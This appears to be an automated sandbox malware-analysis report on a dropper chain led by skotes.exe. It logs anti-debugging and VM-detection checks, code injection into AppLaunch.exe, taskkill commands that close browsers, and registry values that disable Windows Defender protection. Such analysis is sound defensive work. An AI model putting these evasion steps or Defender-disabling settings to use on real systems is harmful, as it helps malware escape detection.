Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1048 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6036 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3992 Thread sleep count: 894 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3992 Thread sleep time: -1788894s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012 Thread sleep count: 1047 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1012 Thread sleep time: -2095047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856 Thread sleep count: 294 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5856 Thread sleep time: -8820000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852 Thread sleep count: 1030 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3852 Thread sleep time: -2061030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3512 Thread sleep count: 1034 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3512 Thread sleep time: -2069034s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6112 Thread sleep count: 364 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6112 Thread sleep time: -728364s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4412 Thread sleep count: 1048 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4412 Thread sleep time: -2097048s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 4420 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 5304 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7788 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7680 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe TID: 7692 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe TID: 3844 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, a6f0d09f38.exe, a6f0d09f38.exe, 0000000D.00000002.2942271609.00000000007E2000.00000040.00000001.01000000.0000000E.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmp, b5da647ae3.exe, b5da647ae3.exe, 0000000E.00000002.2641791818.000000000069B000.00000040.00000001.01000000.0000000F.sdmp, 8b82d73f70.exe, 00000020.00000002.2916077534.000000000052D000.00000040.00000001.01000000.0000001A.sdmp, 98a7b9f337.exe, 00000022.00000002.2962320417.000000000174F000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: firefox.exe, 0000001E.00000002.2955897457.000001C8C37BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW "
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW"z
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: firefox.exe, 0000001F.00000002.2950099066.000001D14E63A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2956647338.000000000122A000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2980852938.000001DEE03BB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2952438162.000001729E3AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: firefox.exe, 00000021.00000002.2953748546.000001729E3E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]gha
Source: firefox.exe, 0000001C.00000002.2997922183.000001DEEA4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2967474510.000001C8C3C1B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: skotes.exe, 00000006.00000002.2957851747.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 98a7b9f337.exe, 00000022.00000002.2946404134.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: file.exe, 00000000.00000002.1711690435.00000000008FB000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1729072200.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1741802385.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp, a6f0d09f38.exe, 0000000D.00000002.2942271609.00000000007E2000.00000040.00000001.01000000.0000000E.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987765650.000000000655D000.00000040.00000800.00020000.00000000.sdmp, b5da647ae3.exe, 0000000E.00000002.2641791818.000000000069B000.00000040.00000001.01000000.0000000F.sdmp, 8b82d73f70.exe, 00000020.00000002.2916077534.000000000052D000.00000040.00000001.01000000.0000001A.sdmp, 98a7b9f337.exe, 00000022.00000002.2962320417.000000000174F000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: firefox.exe, 0000001C.00000002.2980852938.000001DEE03B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001E.00000002.2969252041.000001C8C3D00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2966859320.000001D14EE60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_050F0D2C rdtsc 0_2_050F0D2C
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0071652B mov eax, dword ptr fs:[00000030h] 6_2_0071652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0071A302 mov eax, dword ptr fs:[00000030h] 6_2_0071A302
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: b5da647ae3.exe PID: 5500, type: MEMORYSTR
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46A000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 46C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4FB5008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 6e1fbaaba5.exe, 0000000F.00000002.2740020659.00000000002F2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: GProgram Manager
Source: firefox.exe, 0000001C.00000002.2958480924.000000351FFFB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: firefox.exe, 0000001C.00000003.2809549596.000001DEFB06B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hSoftware\Policies\Microsoft\Windows\PersonalizationNoChangingStartMenuBackgroundPersonalColors_BackgroundWilStaging_02RtlDisownModuleHeapAllocationRtlQueryFeatureConfigurationRtlRegisterFeatureConfigurationChangeNotificationRtlSubscribeWnfStateChangeNotificationRtlDllShutdownInProgressntdll.dllNtQueryWnfStateDataLocal\SM0:%d:%d:%hs_p0Local\SessionImmersiveColorPreferenceBEGINTHMthmfile\Sessions\%d\Windows\ThemeSectionMessageWindowendthemewndThemeApiConnectionRequest\ThemeApiPortwinsta0SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeSystemUsesLightThemedefaultshell\themes\uxtheme\render.cppCompositedWindow::WindowdeletedrcacheMDIClientSoftware\Microsoft\Windows\DWMColorPrevalenceSoftware\Microsoft\Windows\CurrentVersion\ImmersiveShellTabletModeMENUAccentColorSoftware\Microsoft\Windows\CurrentVersion\Explorer\AccentDefaultStartColorControl Panel\DesktopAutoColorizationAccentColorMenuStartColorMenuAutoColorSoftware\Microsoft\Windows\CurrentVersion\Themes\History\ColorsSoftware\Microsoft\Windows\CurrentVersion\Themes\HistoryAccentPaletteTab$Shell_TrayWndLocal\SessionImmersiveColorMutex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006FD3E2 cpuid 6_2_006FD3E2
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_006FCBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_006E65E0 LookupAccountNameA, 6_2_006E65E0
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
